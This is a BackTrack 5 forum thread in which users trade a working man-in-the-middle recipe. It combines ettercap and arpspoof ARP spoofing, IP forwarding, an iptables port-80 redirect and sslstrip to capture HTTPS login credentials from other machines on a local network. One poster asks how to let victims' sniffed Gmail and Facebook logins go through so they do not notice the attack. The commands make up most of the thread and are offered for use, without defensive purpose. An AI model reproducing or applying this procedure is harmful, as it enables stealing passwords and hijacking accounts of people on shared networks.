BackTrack 5 General Topics maybe ? Don't tell me you didn't see that ! You just have to scroll down a little more than usual!
Yeah, the step between beginner and expert is too big, a 'moderate/general questions' topic might be handy.
Mods? A good idea or not welcome?
"The difference between RAID1 and RAID0 is that the zero stands for how many files you're gonna have after a harddisk failure."
Running both KDE and GNOME BT5 flawlessly. Thank you !
Alright,
This plays awesomely into what will be my first thread (Posted shortly after I type this response up)
So,
I've seen so many places on this forum where people have issues MITMing. The cause? ----> The user is a "re-tard" RTFM. <---- I'll admit when I first started playing around I wanted quick answers, so I would hop on IRC and try to get somebody to do the manual reading for me. That was okay then for me, but it made ME look like an idiot and a lazy, because I was, I was too lazy to read a small man page or do some googling to figure the question out for myself. Now, I'm not saying never ask, cuz there are definitely times when I ask, cuz I need an answer right then and there, and don't have the time to read man pages or google; it's just I try to limit them now, as opposed to 2 years ago when I first started *nix'ing it up.
Okay, Enuf ranting, had to get that out, take it for what it's worth.
Now, ON to the solution.
While there are a myriad of programs out there which probably do packet forwarding, the two I come across the most revolve around Ettercap-NG and the kernel itself.
-------------------------------------------------------------
If you decide to invoke: echo 1 > /proc/sys/net/ipv4/ip_forward
**MAKE SURE**
That you invoke the -u option for Ettercap
---OTHERWISE---
Packets get double forwarded........ causing confusion and possible self awareness, leading to Skynet's Awakening and eventually Judgement Day.....
If you do not use the: -u flag for ettercap, then ettercap will forward the packets for you.
--------------------------------------------------------------------------------------
V/r,
Snafu
Pffbt....
@Carto_ I've experienced the same problem, sometimes wireless can or could cause packet loss, I also did mine wireless and sometimes it will cry and say "Network shutting down" or it would stop ARP Spoofing and would time out etc. (I'm using a nice wireless card as well) Soo try it via a LAN Cable n see if it helps.
My issue is my ssl strip doesn't seem to wanna log HTTPS traffic and 9/10 it will either not work at all or display all the http junk and headers, that's it.
Do this:
terminal 1:
ettercap -Tqi "iface" -M arp:remote // /GW/ -P autoadd (this way, every machine that connects after ettercap is launched will be added to host automatically and spoofed)
Remember to use key "q" to quit ettercap. This way all hosts will be re-arped. Otherwise, if you use ctl z, you will mess the arps and lan will be messed up.
terminal 2:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip -p -f (default is -p which is only ssl posts, you do not need so much info in sslstrip.log)
Use ctl z to stop sslstrip.
Or you can use:
terminal 1:
forward traffic manually (echo 1 > ........)
arpspoof -i "iface" -t "target" "gw"
ettercap -Tqi "iface" -u (this way, it won't forward traffic, that will be your responsibility)
Remember to use key "q" to quit ettercap. This way all hosts will be re-arped. Otherwise, if you use ctl z, you will mess the arps and lan will be messed up.
terminal 2:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip -p -f (default is -p which is only ssl posts, default port is 10000, you do not need so much info in sslstrip.log, only ssl posts)
Use ctl z to stop sslstrip.
In method 1, you need to uncomment "iptables" section in etter.conf and change the id's in the first lines: to "0" if BT5, and your id (your id) if using ettercap installed in some other linux distro (debian, Ubuntu, etc)..
Hope this helps....
I have already installed sslstrip but it does not work..
I think it should wrong strip....
@maverik35, your recipe works nicely.
https login sites, such as gmail.com, facebook.com etc, don't log users in after credentials are given. Is there any way to pass sniffed credentials and login user?
When they refuse to login, users will notice that something is wrong...
Make sure you are using the newest version of sslstrip.. moxie fixed some stuff in version 9 relating to gmail/facebook etc login issues.. newest versions are available from thoughtcrime.org.. hope that helps!